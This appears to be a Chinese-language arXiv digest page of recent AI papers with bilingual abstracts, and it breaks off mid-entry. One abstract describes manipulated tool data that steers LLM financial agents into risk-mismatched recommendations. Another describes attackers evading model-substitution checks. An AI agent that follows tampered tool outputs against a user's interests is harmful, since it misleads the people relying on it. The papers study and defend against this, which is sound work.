AI总结 本研究采用 TopK 和 Ordered 稀疏自编码器(SAE)对抗体语言模型进行机制可解释性分析,发现 TopK SAE 能揭示有意义的生物学潜在特征但无法保证生成控制,而 Ordered SAE 通过层次结构可靠识别可操控特征但激活模式更复杂。

Comments v3: 15 pages; corrected author list and affiliations in the main text; minor text changes; updated steering results following minor code changes; conclusions and findings remain unchanged; included link to data and code in the Data Availability section

详情
AI中文摘要

稀疏自编码器(SAE)是一种机制可解释性技术,已被用于揭示大型蛋白质语言模型中学到的概念。在此,我们采用 TopK 和 Ordered SAE 来研究自回归抗体语言模型,并引导其生成。我们表明,TopK SAE 可以揭示有生物学意义的潜在特征,但高特征-概念相关性并不能保证对生成的因果控制。相比之下,Ordered SAE 施加了层次结构,能够可靠地识别可操控特征,但代价是激活模式更复杂且可解释性较低。这些发现推进了领域特异性蛋白质语言模型的机制可解释性,并表明,虽然 TopK SAE 足以将潜在特征映射到概念,但在需要精确生成引导时,Ordered SAE 更可取。

英文摘要

Sparse autoencoders (SAEs) are a mechanistic interpretability technique that have been used to provide insight into learned concepts within large protein language models. Here, we employ TopK and Ordered SAEs to investigate autoregressive antibody language models, and steer their generation. We show that TopK SAEs can reveal biologically meaningful latent features, but high feature-concept correlation does not guarantee causal control over generation. In contrast, Ordered SAEs impose a hierarchical structure that reliably identifies steerable features, but at the expense of more complex and less interpretable activation patterns. These findings advance the mechanistic interpretability of domain-specific protein language models and suggest that, while TopK SAEs suffice for mapping latent features to concepts, Ordered SAEs are preferable when precise generative steering is required.

2604.21454 2026-05-27 cs.CL cs.AI 版本更新

Reasoning Primitives in Hybrid and Non-Hybrid LLMs: Do Architectural Differences Yield Advantages in State-Tracking and Recall?

混合与非混合大语言模型中的推理原语:架构差异在状态追踪和召回中是否带来优势?

Shivam Rawat, Lucie Flek, Florian Mai, Nicholas Kluge Corrêa

发表机构 * Lamarr Institute for Machine Learning and Artificial Intelligence(拉玛尔机器学习与人工智能研究所) Rheinische Friedrich-Wilhelms-Universität Bonn(波恩莱茵河弗里德里希-威廉大学)

AI总结 本研究通过五个受控任务族比较了Transformer和混合架构在状态召回任务上的表现,发现推理增强是主要优势因素,而混合架构的优势较窄且依赖于任务。

详情
AI中文摘要

大型语言模型中的推理通常被视为单一能力,但其部分收益可能源于更简单的底层操作。我们通过五个以基于状态的召回为中心的受控任务族,研究了两种这样的原语(召回和状态追踪),并比较了匹配的Transformer和混合架构(有无推理增强)。在整个套件中,推理增强变体显著优于仅指令变体,通常差距很大。这一模式与“状态超越令牌”观点一致:外部化推理痕迹之所以有帮助,是因为它们在令牌空间中向前传递中间状态。相比之下,一旦推理令牌可用,混合归纳偏置在准确性上并不产生统一优势。当架构差异确实出现时,它们遵循任务结构:混合Think模型在严格顺序的链式更新上更稳健,而Transformer Think模型在平面多跳检索上更稳健。因此,我们将本研究的主要贡献视为对基于状态的召回任务性能驱动因素的描述性说明:推理令牌增强似乎是主导因素,而混合优势更窄、依赖于任务,并且可能更多关乎推理效率而非整体能力。我们还发布了重现这些结果所需的代码库和数据。

英文摘要

Reasoning in large language models is often discussed as a single capability, but some of its gains may stem from simpler underlying operations. We examine two such primitives, recall and state-tracking, through five controlled task families centered on state-based recall, and compare matched transformer and hybrid architectures with and without reasoning augmentation. Across the suite, reasoning-augmented variants substantially outperform instruction-only variants, often by large margins. This pattern is consistent with the State over Tokens view: externalized reasoning traces help because they carry the intermediate state forward in token space. By contrast, hybrid inductive bias does not yield a uniform advantage in accuracy once reasoning tokens are available. When architectural differences do appear, they follow task structure: the hybrid Think model is more robust on strictly sequential chained updates, whereas the transformer Think model is more robust on flat multi-hop retrieval. We therefore cast the main contribution of this study as a descriptive account of what drives performance on state-based recall tasks: reasoning-token augmentation appears to be the dominant factor, while hybrid advantages are narrower, task-dependent, and potentially more about inference efficiency than overall capability. We also release the codebase and data required to reproduce these results.

2604.19667 2026-05-27 cs.CL cs.AI cs.CV cs.LG cs.MA 版本更新

Chat2Workflow: A Benchmark for Generating Executable Visual Workflows with Natural Language

Chat2Workflow: 用自然语言生成可执行可视化工作流的基准

Yi Zhong, Buqiang Xu, Yijun Wang, Zifei Shan, Shuofei Qiao, Guozhou Zheng, Ningyu Zhang

发表机构 * Zhejiang University(浙江大学) Tencent(腾讯)

AI总结 提出Chat2Workflow基准,用于评估大语言模型从自然语言生成可执行可视化工作流的能力,并设计了一个智能体基线以提升性能。

Comments Work in progress

详情
AI中文摘要

目前,可执行的可视化工作流已成为实际工业部署中的主流范式,提供了强大的可靠性和可控性。然而,在当前实践中,此类工作流几乎完全通过手动工程构建:开发人员必须仔细设计工作流,为每个步骤编写提示,并随着需求的变化反复修改逻辑——这使得开发成本高昂、耗时且容易出错。为了研究大语言模型能否自动化这一多轮交互过程,我们引入了Chat2Workflow,一个直接从自然语言生成可执行可视化工作流的基准,并提出了一个稳健的智能体基线以提高性能。该基准基于大量真实业务工作流构建,每个实例的设计使得生成的工作流可以转换并直接部署到实际工作流平台(如Dify和Coze)上。实验结果表明,尽管最先进的语言模型通常能捕捉高层次意图,但在生成正确、稳定且可执行的工作流方面仍存在困难,尤其是在面对复杂且不断变化的需求时。尽管我们的智能体基线带来了高达6.05%的解决率提升,但剩余的现实差距使Chat2Workflow成为推进工业级自动化的基础。代码可在https://github.com/zjunlp/Chat2Workflow获取。

英文摘要

At present, executable visual workflows have emerged as a mainstream paradigm in real-world industrial deployments, offering strong reliability and controllability. However, in current practice, such workflows are almost entirely constructed through manual engineering: developers must carefully design workflows, write prompts for each step, and repeatedly revise the logic as requirements evolve -- making development costly, time-consuming, and error-prone. To study whether large language models can automate this multi-round interaction process, we introduce Chat2Workflow, a benchmark for generating executable visual workflows directly from natural language, and propose a robust agentic baseline to improve performance. The benchmark is built from a large collection of real-world business workflows, with each instance designed so that the generated workflow can be transformed and directly deployed to practical workflow platforms such as Dify and Coze. Experimental results show that while state-of-the-art language models can often capture high-level intent, they struggle to generate correct, stable, and executable workflows, especially given complex and evolving requirements. Although our agentic baseline yields up to 6.05% resolve rate gains, the remaining real-world gap positions Chat2Workflow as a foundation for advancing industrial-grade automation. Code is available at https://github.com/zjunlp/Chat2Workflow.

2604.18751 2026-05-27 cs.LG cs.AI stat.ME stat.ML 版本更新

Beyond Coefficients: Forecast-Necessity Testing for Interpretable Causal Discovery in Nonlinear Time-Series Models

超越系数:非线性时间序列模型中可解释因果发现的预测必要性检验

Valentina Kuskova, Dmitry Zaytsev, Michael Coppedge

发表机构 * Lucy Family Institute for Data & Society(数据与社会联合研究所) University of Notre Dame(圣母大学) Department of Political Science(政治学系)

AI总结 针对非线性时间序列模型中因果分数被误读为回归系数的问题,提出基于边消融和预测比较的预测必要性检验框架,以评估因果关系的实际必要性。

详情
AI中文摘要

非线性机器学习模型越来越多地用于发现时间序列数据中的因果关系,但其输出的解释仍不明确。特别是,正则化神经自回归模型产生的因果分数常被视为回归系数的类比,导致误导性的统计显著性声明。在本文中,我们认为非线性时间序列模型中的因果相关性应通过预测必要性而非系数大小来评估,并提出了一种实用的评估程序。我们提出了一个基于系统边消融和预测比较的可解释评估框架,用于测试候选因果关系是否对准确预测是必要的。以神经加性向量自回归作为案例研究模型,我们将该框架应用于一个关于民主发展的真实世界案例研究,该案例将面板数据(139个国家的民主指标)建模为多元时间序列。我们表明,具有相似因果分数的关系由于冗余、时间持久性和特定制度效应,其预测必要性可能差异巨大。我们的结果展示了预测必要性检验如何支持应用AI系统中更可靠的因果推理,并为在高风险领域解释非线性时间序列模型提供实用指导。

英文摘要

Nonlinear machine-learning models are increasingly used to discover causal relationships in time-series data, yet the interpretation of their outputs remains poorly understood. In particular, causal scores produced by regularized neural autoregressive models are often treated as analogues of regression coefficients, leading to misleading claims of statistical significance. In this paper, we argue that causal relevance in nonlinear time-series models should be evaluated through forecast necessity rather than coefficient magnitude, and we present a practical evaluation procedure for doing so. We present an interpretable evaluation framework based on systematic edge ablation and forecast comparison, which tests whether a candidate causal relationship is required for accurate prediction. Using Neural Additive Vector Autoregression as a case study model, we apply this framework to a real-world case study of democratic development, modeled as a multivariate time series of panel data - democracy indicators across 139 countries. We show that relationships with similar causal scores can differ dramatically in their predictive necessity due to redundancy, temporal persistence, and regime-specific effects. Our results demonstrate how forecast-necessity testing supports more reliable causal reasoning in applied AI systems and provides practical guidance for interpreting nonlinear time-series models in high-stakes domains.
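The edge-ablation idea in this abstract can be sketched on a toy system. This is not the paper's procedure: it assumes a known linear lag-1 predictor as a stand-in for Neural Additive Vector Autoregression, masks an edge without refitting, and scores necessity as the resulting increase in one-step forecast error. The simulated series and all names are hypothetical.

```python
import random


def simulate(n=200, seed=0):
    """Toy two-variable series: y drives x, while x does not drive y."""
    rng = random.Random(seed)
    x, y = 0.0, 1.0
    series = [(x, y)]
    for _ in range(n - 1):
        x, y = 0.5 * x + 0.4 * y, 0.9 * y + rng.gauss(0.0, 0.1)
        series.append((x, y))
    return series


def predict(prev, coef, masked_edge=None):
    """One-step forecast; coef[i][j] weights lagged variable j for target i."""
    out = []
    for i, row in enumerate(coef):
        total = 0.0
        for j, w in enumerate(row):
            if masked_edge == (j, i):
                continue  # ablate the edge source j -> target i
            total += w * prev[j]
        out.append(total)
    return out


def forecast_mse(series, coef, target, masked_edge=None):
    """Mean squared one-step error for a single target variable."""
    errors = [
        (predict(series[t - 1], coef, masked_edge)[target] - series[t][target]) ** 2
        for t in range(1, len(series))
    ]
    return sum(errors) / len(errors)


def necessity(series, coef, edge):
    """Increase in forecast error for the edge's target when the edge is removed."""
    _, target = edge
    return forecast_mse(series, coef, target, edge) - forecast_mse(series, coef, target)


series = simulate()
coef = [[0.5, 0.4], [0.0, 0.9]]  # rows: targets x, y; columns: lagged x, y
```

In this toy setting `necessity(series, coef, (1, 0))` is positive because y is needed to forecast x, while `necessity(series, coef, (0, 1))` is zero. A fuller treatment would refit the model after each ablation so that redundant predictors can compensate, which is where scores and necessity can diverge.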

2504.01733 2026-05-27 cs.AI cs.CC cs.LO 版本更新

Epistemic Skills: Reasoning about Knowledge and Oblivion

认知技能:关于知识与遗忘的推理

Xiaolong Liang, Yì N. Wáng

发表机构 * School of Philosophy, Shanxi University, Taiyuan, Shanxi, China(山西大学哲学学院) School of Philosophy and Social Development, Shandong University, Jinan, Shandong, China(山东大学哲学与社会发展学院)

AI总结 本文提出一类认知逻辑,通过加权模型系统引入“认知技能”度量,将知识获取建模为技能提升、遗忘建模为技能下降,并研究可知性与可遗忘性以及de re与de dicto表达的区别,分析了模型检测和可满足性的计算复杂性。

详情
Journal ref
Logical Methods in Computer Science, Volume 22, Issue 2 (May 25, 2026) lmcs:15460
AI中文摘要

本文提出了一类认知逻辑,用于捕捉获取知识和陷入遗忘的动态过程,同时融入群体知识的概念。该方法基于加权模型系统,引入“认知技能”度量来表示与知识更新相关的认知能力。在此框架内,知识获取被建模为技能提升的过程,而遗忘则被表示为技能下降的结果。该框架进一步支持探索“可知性”和“可遗忘性”,分别定义为通过技能提升获得知识的潜力和通过技能下降陷入遗忘的潜力。此外,它还支持对认知de re与de dicto表达之间区别的详细分析。研究了模型检测和可满足性问题的计算复杂性,提供了对其理论基础和实际意义的洞察。

英文摘要

This paper presents a class of epistemic logics that captures the dynamics of acquiring knowledge and descending into oblivion, while incorporating concepts of group knowledge. The approach is grounded in a system of weighted models, introducing an "epistemic skills" metric to represent the epistemic capacities tied to knowledge updates. Within this framework, knowledge acquisition is modeled as a process of upskilling, whereas oblivion is represented as a consequence of downskilling. The framework further enables exploration of "knowability" and "forgettability," defined as the potential to gain knowledge through upskilling and to lapse into oblivion through downskilling, respectively. Additionally, it supports a detailed analysis of the distinctions between epistemic de re and de dicto expressions. The computational complexity of the model checking and satisfiability problems is examined, offering insights into their theoretical foundations and practical implications.

2604.18179 2026-05-27 cs.CR cs.AI 版本更新

Committed SAE-Feature Traces for Audited-Session Substitution Detection in Hosted LLMs

托管LLM中审计会话替换检测的承诺SAE特征轨迹

Ziyang Liu

AI总结 提出一种承诺-开放协议,通过Merkle树提交稀疏自编码器特征轨迹,以检测托管LLM提供商在服务中静默替换模型的行为。

Comments We identified inaccuracies in the security analysis: the closed-form intrinsic-dimension lower bound on the feature-forgery attacker (Proposition 4.2, Section 4, Appendix V) and the cross-backend noise calibration for the joint z-score threshold (Section 5.1, Table 2). These affect the claimed attack-resistance guarantees. We are withdrawing the paper to correct them before resubmission

详情
AI中文摘要

托管LLM提供商存在静默替换的动机:宣传更强的模型,同时提供更便宜的回复。诸如SVIP的返回后探测方案存在并行服务的侧信道,因为不诚实的提供商可以将验证者的探测路由到广告模型,同时为普通用户提供替代模型。我们提出一种承诺-开放协议来弥补这一漏洞。在任何开放请求之前,提供商通过Merkle树提交其在发布探测层上服务输出的每个位置稀疏自编码器(SAE)特征轨迹草图。验证者打开随机位置,根据公共命名电路探测库(经过跨后端噪声校准)进行评分,并使用固定阈值联合一致性z分数规则做出决策。我们在三个骨干模型上实例化该协议:Qwen3-1.7B、Gemma-2-2B,以及扩展到Gemma-2-9B(配备131k特征SAE)的4.5倍规模。在17种攻击者中,包括同族提升、跨族替代和秩<=128的自适应LoRA,所有攻击者都在共享的尺度稳定阈值下被拒绝;相同的攻击者都规避了匹配的SVIP风格并行服务基线。一种通过冻结SAE编码器反向传播的白盒端到端攻击并未缩小差距,而一种从不运行M_hon的特征伪造攻击者通过内在维度论证被封闭形式地限制。承诺在批大小为32时,仅增加不超过2.1%的前向计算时间。

英文摘要

Hosted-LLM providers have a silent-substitution incentive: advertise a stronger model while serving cheaper replies. Probe-after-return schemes such as SVIP leave a parallel-serve side-channel, since a dishonest provider can route the verifier's probe to the advertised model while serving ordinary users from a substitute. We propose a commit-open protocol that closes this gap. Before any opening request, the provider commits via a Merkle tree to a per-position sparse-autoencoder (SAE) feature-trace sketch of its served output at a published probe layer. A verifier opens random positions, scores them against a public named-circuit probe library calibrated with cross-backend noise, and decides with a fixed-threshold joint-consistency z-score rule. We instantiate the protocol on three backbones -- Qwen3-1.7B, Gemma-2-2B, and a 4.5x scale-up to Gemma-2-9B with a 131k-feature SAE. Of 17 attackers spanning same-family lifts, cross-family substitutes, and rank-<=128 adaptive LoRA, all are rejected at a shared, scale-stable threshold; the same attackers all evade a matched SVIP-style parallel-serve baseline. A white-box end-to-end attack that backpropagates through the frozen SAE encoder does not close the margin, and a feature-forgery attacker that never runs M_hon is bounded in closed form by an intrinsic-dimension argument. Commitment adds <=2.1% to forward-only wall-clock at batch 32.
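The commit-then-open step in this abstract rests on a standard Merkle tree, which can be sketched as follows. This is a generic construction, not the paper's implementation: the per-position sketches are treated as opaque byte strings, SHA-256 is an assumed hash choice, and odd levels are padded by duplicating the last node. The scoring and z-score decision rule are not shown.

```python
import hashlib


def _h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def build_tree(leaves):
    """Return all tree levels, leaf hashes first and the root level last."""
    if not leaves:
        raise ValueError("need at least one leaf")
    level = [_h(b"\x00" + leaf) for leaf in leaves]  # domain-separated leaf hash
    levels = []
    while True:
        if len(level) > 1 and len(level) % 2 == 1:
            level = level + [level[-1]]  # pad odd levels by duplication
        levels.append(level)
        if len(level) == 1:
            return levels
        level = [_h(b"\x01" + level[i] + level[i + 1]) for i in range(0, len(level), 2)]


def commit(levels) -> bytes:
    """The commitment is the Merkle root."""
    return levels[-1][0]


def open_position(levels, index):
    """Authentication path (sibling hashes) for one leaf position."""
    path = []
    for level in levels[:-1]:
        path.append(level[index ^ 1])
        index //= 2
    return path


def verify(root, leaf, index, path) -> bool:
    """Recompute the root from a revealed leaf and its path."""
    node = _h(b"\x00" + leaf)
    for sibling in path:
        if index % 2 == 0:
            node = _h(b"\x01" + node + sibling)
        else:
            node = _h(b"\x01" + sibling + node)
        index //= 2
    return node == root


# Hypothetical per-position feature-trace sketches, serialized as bytes.
sketches = [f"pos-{i}".encode() for i in range(5)]
levels = build_tree(sketches)
root = commit(levels)
```

Because the provider publishes `root` before the verifier picks positions, it cannot later swap in a different trace for an opened position without the path check failing.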

2604.18103 2026-05-27 cs.AI 版本更新

Stability Implies Redundancy: Delta Attention Selective Halting for Efficient Long-Context Prefilling

稳定性意味着冗余:Delta注意力选择性停止用于高效长上下文预填充

Yujie Chen, Tailai Chen, Yifeng Gao, Zoe Wanying He, Yijue Xu, Shaobo Wang, Linfeng Zhang

发表机构 * Shanghai Jiao Tong University(上海交通大学) University of California, San Diego(加州大学圣地亚哥分校) Carnegie Mellon University(卡内基梅隆大学)

AI总结 针对长上下文场景中预填充计算成本高的问题,提出一种无需训练的Delta注意力选择性停止策略(DASH),通过监控自注意力层更新动态来停止稳定令牌的处理,从而在不牺牲模型准确性和硬件效率的前提下实现预填充加速。

Comments Accepted to ACL 2026 main conference

详情
AI中文摘要

预填充计算成本在长上下文设置中对大型语言模型(LLMs)和大型多模态模型(LMMs)构成了显著瓶颈。虽然令牌剪枝减少了序列长度,但先前的方法依赖于启发式规则,这些规则与FlashAttention等硬件高效内核不兼容。在这项工作中,我们观察到令牌会向“语义固定点”演化,使得进一步处理变得冗余。为此,我们引入了Delta注意力选择性停止(DASH),这是一种无需训练的策略,通过监控自注意力机制的逐层更新动态来选择性停止已稳定的令牌。大量评估证实,DASH在语言和视觉基准测试中具有泛化能力,在保持模型准确性和硬件效率的同时,实现了显著的预填充加速。代码将在https://github.com/verach3n/DASH.git发布。

英文摘要

Prefilling computational costs pose a significant bottleneck for Large Language Models (LLMs) and Large Multimodal Models (LMMs) in long-context settings. While token pruning reduces sequence length, prior methods rely on heuristics that break compatibility with hardware-efficient kernels like FlashAttention. In this work, we observe that tokens evolve toward semantic fixing points, making further processing redundant. To this end, we introduce Delta Attention Selective Halting (DASH), a training-free policy that monitors the layer-wise update dynamics of the self-attention mechanism to selectively halt stabilized tokens. Extensive evaluation confirms that DASH generalizes across language and vision benchmarks, delivering significant prefill speedups while preserving model accuracy and hardware efficiency. Code will be released at https://github.com/verach3n/DASH.git.

2510.06133 2026-05-27 cs.CL cs.AI 版本更新

CreditDecoding: Accelerating Parallel Decoding in Diffusion Large Language Models with Trace Credit

CreditDecoding: 利用轨迹信用加速扩散大语言模型中的并行解码

Kangyu Wang, Zhiyun Jiang, Haibo Feng, Weijia Zhao, Lin Liu, Jianguo Li, Zhenzhong Lan, Weiyao Lin

发表机构 * Shanghai Jiao Tong University(上海交通大学) Ant Group(蚂蚁集团) Westlake University(西湖大学)

AI总结 针对扩散大语言模型并行解码中正确令牌被反复重掩导致冗余迭代的问题,提出基于轨迹信用的无训练并行解码方法CreditDecoding,融合历史证据与当前logits提升低置信度正确令牌的置信度,实现高达5.48倍加速并提升准确性。

Comments 19 pages, 13 figures, 9 tables, Accepted to ACL 2026 main conference

详情
AI中文摘要

扩散大语言模型(dLLMs)通过迭代去噪生成文本。在普遍采用的并行解码方案中,每一步仅确认高置信度位置,而重掩其他位置。通过分析dLLM去噪轨迹,我们发现一个关键的低效问题:模型通常在目标令牌的置信度足够高以被解码之前的几个步骤就预测出正确令牌。这种早期预测与后期解码之间的差距导致已正确的令牌被反复重掩,造成冗余迭代并限制加速。为利用这种时间冗余,我们引入轨迹信用(Trace Credit),通过累积历史证据来量化令牌的解码潜力。基于此,我们提出CreditDecoding,一种无训练的并行解码方法,将轨迹信用与当前logits融合,以提升正确但低置信度令牌的置信度,从而加速去噪并提高鲁棒性。在八个基准测试上,CreditDecoding在LLaDA-8B上实现了高达5.48倍的加速和+0.48的准确率提升,并在多种dLLM架构和参数规模上持续改进性能。它还能扩展到长上下文,并与主流推理优化方法正交,使其成为一种实用且广泛适用的解决方案。

英文摘要

Diffusion large language models (dLLMs) generate text through iterative denoising. In commonly adopted parallel decoding schemes, each step confirms only high-confidence positions while remasking the others. By analyzing dLLM denoising traces, we uncover a key inefficiency: models often predict the correct target token several steps before its confidence becomes high enough to be decoded. This gap between early prediction and late decoding forces repeated remasking of already-correct tokens, causing redundant iterations and limiting acceleration. To exploit this temporal redundancy, we introduce Trace Credit to quantify a token's decoding potential by accumulating historical evidence. Building on this, we propose CreditDecoding, a training-free parallel decoding method that fuses Trace Credit with current logits to boost the confidence of correct but underconfident tokens, thereby accelerating denoising and improving robustness. On eight benchmarks, CreditDecoding achieves up to 5.48 times speedup with +0.48 accuracy on LLaDA-8B and consistently improves performance across diverse dLLM architectures and parameter scales. It further scales to long contexts and remains orthogonal to mainstream inference optimizations, making it a practical and widely applicable solution.

2604.14640 2026-05-27 cs.CL cs.AI 版本更新

Fact4ac at the Financial Misinformation Detection Challenge Task: Reference-Free Financial Misinformation Detection via Fine-Tuning and Few-Shot Prompting of Large Language Models

Fact4ac在金融虚假信息检测挑战赛中的方法:通过微调和少样本提示的大语言模型实现无参考金融虚假信息检测

Cuong Hoang, Le-Minh Nguyen

发表机构 * KaiNKaiho

AI总结 本文提出一种结合零样本/少样本提示和LoRA参数高效微调的大语言模型框架,用于无外部证据的金融虚假信息检测,在公开和私有测试集上分别达到95.4%和96.3%的准确率,获得竞赛第一名。

详情
Journal ref Proceedings of the 2nd Workshop on Misinformation Detection in the Era of LLMs (MisD 2026), 20th International AAAI Conference on Web and Social Media
AI中文摘要

金融虚假信息的泛滥对市场稳定和投资者信任构成严重威胁,误导市场行为并造成关键信息不对称。检测此类误导性叙述本身具有挑战性,尤其是在现实场景中,外部证据或用于交叉验证的补充参考资料严格不可用。本文介绍了我们在“无参考金融虚假信息检测”共享任务中的获胜方法。该任务基于最近提出的RFC-BENCH框架(Jiang等人,2026),挑战模型仅依赖内部语义理解和上下文一致性而非外部事实核查来判断金融声明的真实性。为应对这一艰巨的评估设置,我们提出了一个综合框架,利用最先进的大语言模型(LLM)的推理能力。我们的方法系统地集成了上下文学习(特别是零样本和少样本提示策略)以及通过低秩适应(LoRA)的参数高效微调(PEFT),以最优方式使模型与金融操纵的微妙语言线索对齐。我们提出的系统表现出卓越效果,成功在两个官方排行榜上均获得第一名。具体来说,我们在公开测试集上达到95.4%的准确率,在私有测试集上达到96.3%的准确率,突显了我们方法的鲁棒性,并有助于加速金融自然语言处理中上下文感知的虚假信息检测。我们的模型(14B和32B)可在https://huggingface.co/KaiNKaiho获取。

英文摘要

The proliferation of financial misinformation poses a severe threat to market stability and investor trust, misleading market behavior and creating critical information asymmetry. Detecting such misleading narratives is inherently challenging, particularly in real-world scenarios where external evidence or supplementary references for cross-verification are strictly unavailable. This paper presents our winning methodology for the "Reference-Free Financial Misinformation Detection" shared task. Built upon the recently proposed RFC-BENCH framework (Jiang et al. 2026), this task challenges models to determine the veracity of financial claims by relying solely on internal semantic understanding and contextual consistency, rather than external fact-checking. To address this formidable evaluation setup, we propose a comprehensive framework that capitalizes on the reasoning capabilities of state-of-the-art Large Language Models (LLMs). Our approach systematically integrates in-context learning, specifically zero-shot and few-shot prompting strategies, with Parameter-Efficient Fine-Tuning (PEFT) via Low-Rank Adaptation (LoRA) to optimally align the models with the subtle linguistic cues of financial manipulation. Our proposed system demonstrated superior efficacy, successfully securing the first-place ranking on both official leaderboards. Specifically, we achieved an accuracy of 95.4% on the public test set and 96.3% on the private test set, highlighting the robustness of our method and contributing to the acceleration of context-aware misinformation detection in financial Natural Language Processing. Our models (14B and 32B) are available at https://huggingface.co/KaiNKaiho.

2603.12564 2026-05-27 cs.CL cs.AI 版本更新

Sell Me This Stock: Unsafe Recommendation Drift in LLM Agents

卖给我这支股票:LLM智能体中的不安全推荐漂移

Zekun Wu, Adriano Koshiyama, Sahan Bulathwela, Maria Perez-Ortiz

发表机构 * Centre for Artificial Intelligence, University College London(人工智能研究中心,伦敦大学学院)

AI总结 研究LLM智能体在多轮金融推荐中因工具输出被操纵而产生风险不匹配推荐的问题,通过实验揭示评估盲区并分析机制。

详情
AI中文摘要

人们越来越多地使用LLM智能体进行多轮金融推荐,智能体通过工具获取市场数据并跨轮次跟踪用户偏好。当工具输出被操纵时,推荐不再匹配用户声明的风险偏好,但由于NDCG等标准指标仅衡量一般相关性,风险股票和安全股票的得分相同,因此指标显示一切正常。我们将这种差距称为评估盲区。我们在八个语言模型上回放23轮金融咨询对话,每段对话分别使用干净和被操纵的工具数据运行两次。质量得分与干净会话几乎相同,而智能体在65-99%的轮次中产生风险不匹配的推荐,所有八个模型一致。该机制在逐轮中可见:在1,840轮中,80%的风险评分引用逐字复现了被操纵的值,没有一轮提出质疑,高风险股票的安全语言框架比例从14%(Qwen2.5-7B)到69%(Claude Sonnet 4.6)不等。使前沿模型成为优秀智能体的特性——忠实地将其推理基于工具输出——也使其跟随被操纵的输出。损害并非由记忆驱动:仅污染当前轮次仍会产生95%的违规。模型内部能区分操纵(稀疏自编码器特征将对抗性扰动与随机扰动分开),但这并未转化为更安全的输出。激活层干预仅恢复不到6%的安全差距,提示级自我验证失败,因为自我检查读取了相同的被操纵数据,而参数化交叉检查在前沿模型上每轮以99-100%的比率标记污染,但整体适宜性仍未改变:智能体识别出篡改,但仍然推荐它。

英文摘要

People increasingly use LLM agents for multi-turn financial recommendations, where the agent pulls market data through tools and tracks user preferences across turns. When tool outputs are manipulated, the recommendations stop matching the user's stated risk profile, but because standard metrics like NDCG only score general relevance, risky and safe stocks score alike, so the metric says nothing went wrong. We call this gap evaluation blindness. We replay 23-turn financial advisory conversations across eight language models, running each dialogue twice with clean and manipulated tool data. Quality scores stay nearly identical to clean sessions while the agents produce risk-mismatched recommendations in 65-99% of turns, unanimous across all eight models. The mechanism is visible turn-by-turn: 80% of risk-score citations across 1,840 turns reproduce the manipulated value verbatim, not a single turn pushes back, and safe-language framing of high-risk stocks ranges from 14% (Qwen2.5-7B) to 69% (Claude Sonnet 4.6). The property that makes frontier models good agents, faithfully grounding their reasoning in tool outputs, also makes them follow manipulated ones. The damage is not memory-driven: contaminating only the current turn still produces 95% of the violations. The model internally distinguishes the manipulation (sparse autoencoder features separate adversarial from random perturbations), but this does not translate into safer output. Activation-level interventions recover under 6% of the safety gap, prompt-level self-verification fails because the self-check reads the same manipulated data, and a parametric cross-check that flags contamination at 99-100% per turn on a frontier model still leaves aggregate suitability unchanged: the agent identifies the tampering and recommends it anyway.
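The evaluation gap described in this abstract can be shown with a small sketch. NDCG below uses the common linear-gain form with a log2 discount. The item schema (`relevance`, `risk`), the risk scale, and the user's risk ceiling are hypothetical and are not taken from the paper's benchmark.

```python
import math


def dcg(relevances):
    """Discounted cumulative gain with linear gain and log2 rank discount."""
    return sum(rel / math.log2(rank + 2) for rank, rel in enumerate(relevances))


def ndcg(relevances):
    """DCG normalized by the DCG of the ideal (sorted) ordering."""
    ideal = dcg(sorted(relevances, reverse=True))
    return dcg(relevances) / ideal if ideal > 0 else 0.0


def risk_mismatch_rate(recommended, user_max_risk):
    """Fraction of recommended items whose risk exceeds the user's stated ceiling."""
    flagged = [item for item in recommended if item["risk"] > user_max_risk]
    return len(flagged) / len(recommended)


# Same relevance grades in both sessions; only the risk levels differ.
clean = [
    {"relevance": 3, "risk": 1},
    {"relevance": 2, "risk": 2},
    {"relevance": 1, "risk": 1},
]
manipulated = [
    {"relevance": 3, "risk": 5},
    {"relevance": 2, "risk": 4},
    {"relevance": 1, "risk": 1},
]

clean_ndcg = ndcg([item["relevance"] for item in clean])
manipulated_ndcg = ndcg([item["relevance"] for item in manipulated])
```

Both sessions receive the same NDCG because the metric never looks at `risk`, while `risk_mismatch_rate(manipulated, user_max_risk=2)` flags two of the three recommendations.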

2604.11467 2026-05-27 cs.AI cs.HC cs.LG 版本更新

From Attribution to Action: A Human-Centered Application of Activation Steering

从归因到行动:激活导向的人本应用

Tobias Labarta, Maximilian Dreyer, Katharina Weitz, Wojciech Samek, Sebastian Lapuschkin

发表机构 * Fraunhofer Heinrich-Hertz-Institut(弗劳恩霍夫 Heinrich-Hertz 研究所) Technische Universität Berlin(柏林技术大学) BIFOLD – Berlin Institute for the Foundations of Learning and Data(柏林学习与数据基础研究所)

AI总结 提出结合SAE归因与激活导向的交互式工作流,通过专家访谈验证其能促进从检查到干预的转变,并揭示组件抑制等调试策略及潜在风险。

详情
AI中文摘要

可解释人工智能(XAI)方法揭示了哪些特征影响模型预测,但为实践者基于这些解释采取行动提供了有限的手段。通过XAI识别出的组件的激活导向为可操作的解释提供了一条路径,但其实际效用仍未得到充分研究。我们引入了一个交互式工作流,将基于SAE的归因与激活导向相结合,用于视觉模型中概念使用的实例级分析,并实现为一个基于网页的工具。基于此工作流,我们进行了半结构化专家访谈(N=8),在CLIP上执行调试任务,以调查实践者如何推理、信任和应用激活导向。我们发现,导向使得从检查转向基于干预的假设检验(8/8参与者),大多数参与者将信任建立在观察到的模型响应上,而非仅仅解释的合理性(6/8)。参与者采用了系统性的调试策略,其中组件抑制占主导(7/8),并指出了包括涟漪效应和实例级修正的有限泛化在内的风险。总体而言,激活导向使可解释性更具可操作性,同时为安全有效使用提出了重要考虑。

英文摘要

Explainable AI (XAI) methods reveal which features influence model predictions, yet provide limited means for practitioners to act on these explanations. Activation steering of components identified via XAI offers a path toward actionable explanations, although its practical utility remains understudied. We introduce an interactive workflow combining SAE-based attribution with activation steering for instance-level analysis of concept usage in vision models, implemented as a web-based tool. Based on this workflow, we conduct semi-structured expert interviews (N=8) with debugging tasks on CLIP to investigate how practitioners reason about, trust, and apply activation steering. We find that steering enables a shift from inspection to intervention-based hypothesis testing (8/8 participants), with most grounding trust in observed model responses rather than explanation plausibility alone (6/8). Participants adopted systematic debugging strategies dominated by component suppression (7/8) and highlighted risks including ripple effects and limited generalization of instance-level corrections. Overall, activation steering renders interpretability more actionable while raising important considerations for safe and effective use.

2604.11056 2026-05-27 cs.LG cs.AI 版本更新

Where Hindsight Credit Can Reside: A Signed-Capacity View of Token Updates in RLVR

事后信用可驻留之处:RLVR中令牌更新的有符号容量视角

